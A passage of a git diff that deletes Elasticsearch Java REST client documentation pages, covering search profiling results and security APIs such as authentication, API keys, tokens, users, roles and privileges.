options in one entry - -[id="{upid}-{api}-response-profile"] -===== Retrieving Profiling Results - -Profiling results are retrieved from a +{response}+ using the `getProfileResults()` method. This - method returns a `Map` containing a `ProfileShardResult` object for every shard involved in the - +{request}+ execution. `ProfileShardResult` are stored in the `Map` using a key that uniquely - identifies the shard the profile result corresponds to. - -Here is a sample code that shows how to iterate over all the profiling results of every shard: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling-get] --------------------------------------------------- -<1> Retrieve the `Map` of `ProfileShardResult` from the +{response}+ -<2> Profiling results can be retrieved by shard's key if the key is known, otherwise it might be simpler - to iterate over all the profiling results -<3> Retrieve the key that identifies which shard the `ProfileShardResult` belongs to -<4> Retrieve the `ProfileShardResult` for the given shard - -The `ProfileShardResult` object itself contains one or more query profile results, one for each query -executed against the underlying Lucene index: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling-queries] --------------------------------------------------- -<1> Retrieve the list of `QueryProfileShardResult` -<2> Iterate over each `QueryProfileShardResult` - -Each `QueryProfileShardResult` gives access to the detailed query tree execution, returned as a list of -`ProfileResult` objects: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling-queries-results] --------------------------------------------------- -<1> Iterate over the profile results -<2> Retrieve the name of the Lucene query -<3> Retrieve the time in millis spent executing the Lucene query -<4> Retrieve the profile results for the sub-queries (if any) - -The Rest API documentation contains more information about {ref}/search-profile.html#profiling-queries[Profiling Queries] with -a description of the query profiling information. - -The `QueryProfileShardResult` also gives access to the profiling information for the Lucene collectors: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling-queries-collectors] --------------------------------------------------- -<1> Retrieve the profiling result of the Lucene collector -<2> Retrieve the name of the Lucene collector -<3> Retrieve the time in millis spent executing the Lucene collector -<4> Retrieve the profile results for the sub-collectors (if any) - -The Rest API documentation contains more information about profiling information -for Lucene collectors. See {ref}/search-profile.html#profiling-queries[Profiling queries]. - -In a very similar manner to the query tree execution, the `QueryProfileShardResult` objects gives access -to the detailed aggregations tree execution: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling-aggs] --------------------------------------------------- -<1> Retrieve the `AggregationProfileShardResult` -<2> Iterate over the aggregation profile results -<3> Retrieve the type of the aggregation (corresponds to Java class used to execute the aggregation) -<4> Retrieve the time in millis spent executing the Lucene collector -<5> Retrieve the profile results for the sub-aggregations (if any) - -The Rest API documentation contains more information about -{ref}/search-profile.html#profiling-aggregations[Profiling aggregations]. diff --git a/docs/java-rest/high-level/security/authenticate.asciidoc b/docs/java-rest/high-level/security/authenticate.asciidoc deleted file mode 100644 index 0a2feb31cf9..00000000000 --- a/docs/java-rest/high-level/security/authenticate.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ - --- -:api: authenticate -:response: AuthenticateResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Authenticate API - -[id="{upid}-{api}-sync"] -==== Execution - -Authenticating and retrieving information about a user can be performed -using the `security().authenticate()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- - -This method does not require a request object. The client waits for the -+{response}+ to be returned before continuing with code execution. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains four fields. The `user` field -, accessed with `getUser`, contains all the information about this -authenticated user. The field `enabled`, tells if this user is actually -usable or has been temporarily deactivated. The field `authentication_realm`, -accessed with `getAuthenticationRealm` contains the name and type of the -Realm that has authenticated the user and the field `lookup_realm`, -accessed with `getLookupRealm` contains the name and type of the Realm where -the user information were retrieved from. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getUser` retrieves the `User` instance containing the information, -see {javadoc-client}/security/user/User.html. -<2> `enabled` tells if this user is usable or is deactivated. -<3> `getAuthenticationRealm().getName()` retrieves the name of the realm that authenticated the user. -<4> `getAuthenticationRealm().getType()` retrieves the type of the realm that authenticated the user. -<5> `getLookupRealm().getName()` retrieves the name of the realm from where the user information is looked up. -<6> `getLookupRealm().getType()` retrieves the type of the realm from where the user information is looked up. -<7> `getAuthenticationType()` retrieves the authentication type of the authenticated user. - -[id="{upid}-{api}-async"] -==== Asynchronous Execution - -This request can also be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The `ActionListener` to use when the execution completes. This method does -not require a request object. - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution completed successfully or using the `onFailure` method if -it failed. - -A typical listener for a +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-listener] --------------------------------------------------- -<1> Called when the execution completed successfully. The response is -provided as an argument. -<2> Called in case of a failure. The exception is provided as an argument. - diff --git a/docs/java-rest/high-level/security/change-password.asciidoc b/docs/java-rest/high-level/security/change-password.asciidoc deleted file mode 100644 index 6593e810598..00000000000 --- a/docs/java-rest/high-level/security/change-password.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-change-password]] -=== Change Password API - -[[java-rest-high-security-change-password-execution]] -==== Execution - -A user's password can be changed using the `security().changePassword()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[change-password-execute] --------------------------------------------------- - -[[java-rest-high-change-password-response]] -==== Response - -The returned `Boolean` indicates the request status. - -[[java-rest-high-x-pack-security-change-password-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[change-password-execute-async] --------------------------------------------------- -<1> The `ChangePassword` request to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `Boolean` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[change-password-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument. -<2> Called in case of failure. The raised exception is provided as an argument. diff --git a/docs/java-rest/high-level/security/clear-api-key-cache.asciidoc b/docs/java-rest/high-level/security/clear-api-key-cache.asciidoc deleted file mode 100644 index 2d680145496..00000000000 --- a/docs/java-rest/high-level/security/clear-api-key-cache.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ - --- -:api: clear-api-key-cache -:request: ClearApiKeyCacheRequest -:response: ClearSecurityCacheResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Clear API Key Cache API - -[id="{upid}-{api}-request"] -==== Clear API Key Cache Request - -A +{request}+ supports clearing API key cache for the given IDs. -It can also clear the entire cache if no ID is specified. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> the IDs(s) for the API keys to be evicted from the cache - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clear API Key Cache Response - -The returned +{response}+ allows to retrieve information about where the cache was cleared. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the list of nodes that the cache was cleared on diff --git a/docs/java-rest/high-level/security/clear-privileges-cache.asciidoc b/docs/java-rest/high-level/security/clear-privileges-cache.asciidoc deleted file mode 100644 index 2376c6a5bd8..00000000000 --- a/docs/java-rest/high-level/security/clear-privileges-cache.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ - --- -:api: clear-privileges-cache -:request: ClearPrivilegesCacheRequest -:response: ClearPrivilegesCacheResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Clear Privileges Cache API - -[id="{upid}-{api}-request"] -==== Clear Privileges Cache Request - -A +{request}+ supports defining the name of applications that the cache should be cleared for. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> the name of the application(s) for which the cache should be cleared - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clear Privileges Cache Response - -The returned +{response}+ allows to retrieve information about where the cache was cleared. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the list of nodes that the cache was cleared on diff --git a/docs/java-rest/high-level/security/clear-realm-cache.asciidoc b/docs/java-rest/high-level/security/clear-realm-cache.asciidoc deleted file mode 100644 index 41c100e1ec8..00000000000 --- a/docs/java-rest/high-level/security/clear-realm-cache.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ - --- -:api: clear-realm-cache -:request: ClearRealmCacheRequest -:response: ClearRealmCacheResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Clear Realm Cache API - -[id="{upid}-{api}-request"] -==== Clear Realm Cache Request - -A +{request}+ supports defining the name of realms and usernames that the cache should be cleared -for. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clear Roles Cache Response - -The returned +{response}+ allows to retrieve information about where the cache was cleared. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the list of nodes that the cache was cleared on diff --git a/docs/java-rest/high-level/security/clear-roles-cache.asciidoc b/docs/java-rest/high-level/security/clear-roles-cache.asciidoc deleted file mode 100644 index 39e344f6ce9..00000000000 --- a/docs/java-rest/high-level/security/clear-roles-cache.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ - --- -:api: clear-roles-cache -:request: ClearRolesCacheRequest -:response: ClearRolesCacheResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Clear Roles Cache API - -[id="{upid}-{api}-request"] -==== Clear Roles Cache Request - -A +{request}+ supports defining the name of roles that the cache should be cleared for. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clear Roles Cache Response - -The returned +{response}+ allows to retrieve information about where the cache was cleared. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the list of nodes that the cache was cleared on diff --git a/docs/java-rest/high-level/security/create-api-key.asciidoc b/docs/java-rest/high-level/security/create-api-key.asciidoc deleted file mode 100644 index 497c0fb35e4..00000000000 --- a/docs/java-rest/high-level/security/create-api-key.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: create-api-key -:request: CreateApiKeyRequest -:response: CreateApiKeyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Create API Key API - -API Key can be created using this API. - -[id="{upid}-{api}-request"] -==== Create API Key Request - -A +{request}+ contains an optional name for the API key, -an optional list of role descriptors to define permissions and -optional expiration for the generated API key. -If expiration is not provided then by default the API -keys do not expire. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Create API Key Response - -The returned +{response}+ contains an id, -API key, name for the API key and optional -expiration. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the API key that can be used to authenticate to Elasticsearch. -<2> expiration if the API keys expire diff --git a/docs/java-rest/high-level/security/create-token.asciidoc b/docs/java-rest/high-level/security/create-token.asciidoc deleted file mode 100644 index d911c747a13..00000000000 --- a/docs/java-rest/high-level/security/create-token.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-create-token]] -=== Create Token API - -[[java-rest-high-security-create-token-request]] -==== Request -The `CreateTokenRequest` supports three different OAuth2 _grant types_: - -===== Password Grants - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-password-request] --------------------------------------------------- - -===== Refresh Token Grants -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-refresh-request] --------------------------------------------------- - -===== Client Credential Grants -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-client-credentials-request] --------------------------------------------------- - -[[java-rest-high-security-create-token-execution]] -==== Execution - -Creating a OAuth2 security token can be performed by passing the appropriate request to the - `security().createToken()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-execute] --------------------------------------------------- - -[[java-rest-high-security-create-token-response]] -==== Response - -The returned `CreateTokenResponse` contains the following properties: - -`accessToken`:: This is the newly created access token. - It can be used to authenticate to the Elasticsearch cluster. -`type`:: The type of the token, this is always `"Bearer"`. -`expiresIn`:: The length of time until the token will expire. - The token will be considered invalid after that time. -`scope`:: The scope of the token. May be `null`. -`refreshToken`:: A secondary "refresh" token that may be used to extend - the life of an access token. May be `null`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-response] --------------------------------------------------- -<1> The `accessToken` can be used to authentication to Elasticsearch. -<2> The `refreshToken` can be used in to create a new `CreateTokenRequest` with a `refresh_token` grant. - -[[java-rest-high-security-create-token-async]] -==== Asynchronous Execution - -This request can be executed asynchronously using the `security().createTokenAsync()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-execute-async] --------------------------------------------------- -<1> The `CreateTokenRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `CreateTokenResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument \ No newline at end of file diff --git a/docs/java-rest/high-level/security/delegate-pki-authentication.asciidoc b/docs/java-rest/high-level/security/delegate-pki-authentication.asciidoc deleted file mode 100644 index ca3f832f405..00000000000 --- a/docs/java-rest/high-level/security/delegate-pki-authentication.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ --- -:api: delegate-pki -:request: DelegatePkiAuthenticationRequest -:response: DelegatePkiAuthenticationResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delegate PKI Authentication API - -This API is called by *smart* proxies to Elasticsearch, such as Kibana, that -terminate the user's TLS session but that still wish to authenticate the user -on the Elasticsearch side using a PKI realm, which normally requires users to -authenticate over TLS directly to Elasticsearch. It implements the exchange of -the client's {@code X509Certificate} chain from the TLS authentication into an -Elasticsearch access token. - -IMPORTANT: The association between the subject public key in the target -certificate and the corresponding private key is *not* validated. This is part -of the TLS authentication process and it is delegated to the proxy calling this -API. The proxy is *trusted* to have performed the TLS authentication, and this -API translates that authentication into an Elasticsearch access token. - -[id="{upid}-{api}-request"] -==== Delegate PKI Authentication Request - -The request contains the client's {@code X509Certificate} chain. The -certificate chain is represented as a list where the first element is the -target certificate containing the subject distinguished name that is requesting -access. This may be followed by additional certificates, with each subsequent -certificate being the one used to certify the previous one. The certificate -chain is validated according to RFC 5280, by sequentially considering the trust -configuration of every installed {@code PkiRealm} that has {@code -PkiRealmSettings#DELEGATION_ENABLED_SETTING} set to {@code true} (default is -{@code false}). A successfully trusted target certificate is also subject to -the validation of the subject distinguished name according to that respective's -realm {@code PkiRealmSettings#USERNAME_PATTERN_SETTING}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delegate-pki-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delegate PKI Authentication Response - -The returned +{response}+ contains the following properties: - -`accessToken`:: This is the newly created access token. - It can be used to authenticate to the Elasticsearch cluster. -`type`:: The type of the token, this is always `"Bearer"`. -`expiresIn`:: The length of time (in seconds) until the token will expire. - The token will be considered invalid after that time. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delegate-pki-response] --------------------------------------------------- -<1> The `accessToken` can be used to authentication to Elasticsearch. - - diff --git a/docs/java-rest/high-level/security/delete-privileges.asciidoc b/docs/java-rest/high-level/security/delete-privileges.asciidoc deleted file mode 100644 index 827ccf5b1e5..00000000000 --- a/docs/java-rest/high-level/security/delete-privileges.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ --- -:api: delete-privileges -:request: DeletePrivilegesRequest -:response: DeletePrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Privileges API - -This API can be used to delete application privileges. - -[id="{upid}-{api}-request"] -==== Delete Application Privileges Request - -A +{request}+ has two arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> the name of application -<2> the name(s) of the privileges to delete that belong to the given application - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete Application Privileges Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the name of the application -<2> whether the given privilege was found and deleted diff --git a/docs/java-rest/high-level/security/delete-role-mapping.asciidoc b/docs/java-rest/high-level/security/delete-role-mapping.asciidoc deleted file mode 100644 index 5279d953688..00000000000 --- a/docs/java-rest/high-level/security/delete-role-mapping.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-delete-role-mapping]] -=== Delete Role Mapping API - -[[java-rest-high-security-delete-role-mapping-execution]] -==== Execution -Deletion of a role mapping can be performed using the `security().deleteRoleMapping()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delete-role-mapping-execute] --------------------------------------------------- - -[[java-rest-high-security-delete-role-mapping-response]] -==== Response -The returned `DeleteRoleMappingResponse` contains a single field, `found`. If the mapping -is successfully found and deleted, found is set to true. Otherwise, found is set to false. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delete-role-mapping-response] --------------------------------------------------- -<1> `found` is a boolean indicating whether the role mapping was found and deleted - -[[java-rest-high-security-delete-role-mapping-async]] -==== Asynchronous Execution - -This request can be executed asynchronously using the `security().deleteRoleMappingAsync()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delete-role-mapping-execute-async] --------------------------------------------------- -<1> The `DeleteRoleMappingRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `DeleteRoleMappingResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delete-role-mapping-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/security/delete-role.asciidoc b/docs/java-rest/high-level/security/delete-role.asciidoc deleted file mode 100644 index d2f4ef6f88a..00000000000 --- a/docs/java-rest/high-level/security/delete-role.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ --- -:api: delete-role -:request: DeleteRoleRequest -:response: DeleteRoleResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Role API - -[id="{upid}-{api}-request"] -==== Delete Role Request - -A +{request}+ has a single argument - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> role to delete - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> whether the given role was found diff --git a/docs/java-rest/high-level/security/delete-user.asciidoc b/docs/java-rest/high-level/security/delete-user.asciidoc deleted file mode 100644 index 43d65fc4e97..00000000000 --- a/docs/java-rest/high-level/security/delete-user.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: delete-user -:request: DeleteUserRequest -:response: DeleteUserResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete User API - -[id="{upid}-{api}-request"] -==== Delete User Request - -A user can be deleted as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Delete Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> whether the given user was found - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/security/disable-user.asciidoc b/docs/java-rest/high-level/security/disable-user.asciidoc deleted file mode 100644 index 90b89c2779f..00000000000 --- a/docs/java-rest/high-level/security/disable-user.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-disable-user]] -=== Disable User API - -[[java-rest-high-security-disable-user-execution]] -==== Execution - -Disabling a user can be performed using the `security().disableUser()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[disable-user-execute] --------------------------------------------------- - -[[java-rest-high-security-disable-user-response]] -==== Response - -The returned `Boolean` indicates the request status. - -[[java-rest-high-security-disable-user-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[disable-user-execute-async] --------------------------------------------------- -<1> The `DisableUser` request to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `Boolean` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[disable-user-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument. -<2> Called in case of failure. The raised exception is provided as an argument. diff --git a/docs/java-rest/high-level/security/enable-user.asciidoc b/docs/java-rest/high-level/security/enable-user.asciidoc deleted file mode 100644 index 7e8bac12e27..00000000000 --- a/docs/java-rest/high-level/security/enable-user.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-enable-user]] -=== Enable User API - -[[java-rest-high-security-enable-user-execution]] -==== Execution - -Enabling a disabled user can be performed using the `security().enableUser()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[enable-user-execute] --------------------------------------------------- - -[[java-rest-high-security-enable-user-response]] -==== Response - -The returned `Boolean` indicates the request status. - -[[java-rest-high-security-enable-user-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[enable-user-execute-async] --------------------------------------------------- -<1> The `EnableUser` request to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `Boolean` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[enable-user-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument. -<2> Called in case of failure. The raised exception is provided as an argument. diff --git a/docs/java-rest/high-level/security/get-api-key.asciidoc b/docs/java-rest/high-level/security/get-api-key.asciidoc deleted file mode 100644 index e8dad80b59b..00000000000 --- a/docs/java-rest/high-level/security/get-api-key.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ --- -:api: get-api-key -:request: GetApiKeyRequest -:response: GetApiKeyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get API Key information API - -API Key(s) information can be retrieved using this API. - -[id="{upid}-{api}-request"] -==== Get API Key Request -The +{request}+ supports retrieving API key information for - -. A specific API key - -. All API keys for a specific realm - -. All API keys for a specific user - -. All API keys for a specific user in a specific realm - -. A specific key or all API keys owned by the current authenticated user - -. All API keys if the user is authorized to do so - -===== Retrieve a specific API key by its id -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-api-key-id-request] --------------------------------------------------- - -===== Retrieve a specific API key by its name -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-api-key-name-request] --------------------------------------------------- - -===== Retrieve all API keys for given realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-realm-api-keys-request] --------------------------------------------------- - -===== Retrieve all API keys for a given user -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-user-api-keys-request] --------------------------------------------------- - -===== Retrieve all API keys for given user in a realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-user-realm-api-keys-request] --------------------------------------------------- - -===== Retrieve all API keys for the current authenticated user -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-api-keys-owned-by-authenticated-user-request] --------------------------------------------------- - -===== Retrieve all API keys if the user is authorized to do so -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-all-api-keys-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get API Key information API Response - -The returned +{response}+ contains the information regarding the API keys that were -requested. - -`api_keys`:: Available using `getApiKeyInfos`, contains list of API keys that were retrieved for this request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/security/get-builtin-privileges.asciidoc b/docs/java-rest/high-level/security/get-builtin-privileges.asciidoc deleted file mode 100644 index 8a79d20f39b..00000000000 --- a/docs/java-rest/high-level/security/get-builtin-privileges.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ --- -:api: get-builtin-privileges -:request: GetBuiltinPrivilegesRequest -:response: GetBuiltinPrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Builtin Privileges API - -include::../execution-no-req.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Builtin Privileges Response - -The returned +{response}+ contains the following properties - -`clusterPrivileges`:: -A `Set` of all _cluster_ privileges that are understood by this node. - -`indexPrivileges`:: -A `Set` of all _index_ privileges that are understood by this node. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- - diff --git a/docs/java-rest/high-level/security/get-certificates.asciidoc b/docs/java-rest/high-level/security/get-certificates.asciidoc deleted file mode 100644 index 5ada3c8a712..00000000000 --- a/docs/java-rest/high-level/security/get-certificates.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ - --- -:api: get-certificates -:response: GetSslCertificatesResponse --- - -[role="xpack"] -[id="{upid}-{api}"] -=== SSL Certificate API - -[id="{upid}-{api}-request"] -==== Get Certificates Request - -The X.509 Certificates that are used to encrypt communications in an -Elasticsearch cluster using the `security().getSslCertificates()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[{api}-execute] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Get Certificates Response - -The returned +{response}+ contains a single field, `certificates`. -This field, accessed with `getCertificates` returns a List of `CertificateInfo` -objects containing the information for all the certificates used. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[{api}-response] --------------------------------------------------- -<1> `certificates` is a List of `CertificateInfo` - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/security/get-privileges.asciidoc b/docs/java-rest/high-level/security/get-privileges.asciidoc deleted file mode 100644 index d63f4774d07..00000000000 --- a/docs/java-rest/high-level/security/get-privileges.asciidoc +++ /dev/null @@ -1,47 +0,0 @@ - --- -:api: get-privileges -:request: GetPrivilegesRequest -:response: GetPrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Privileges API - -[id="{upid}-{api}-request"] -==== Get Privileges Request - -The +{request}+ supports getting privilege(s) for all or for specific applications. - -===== Specific privilege of a specific application - 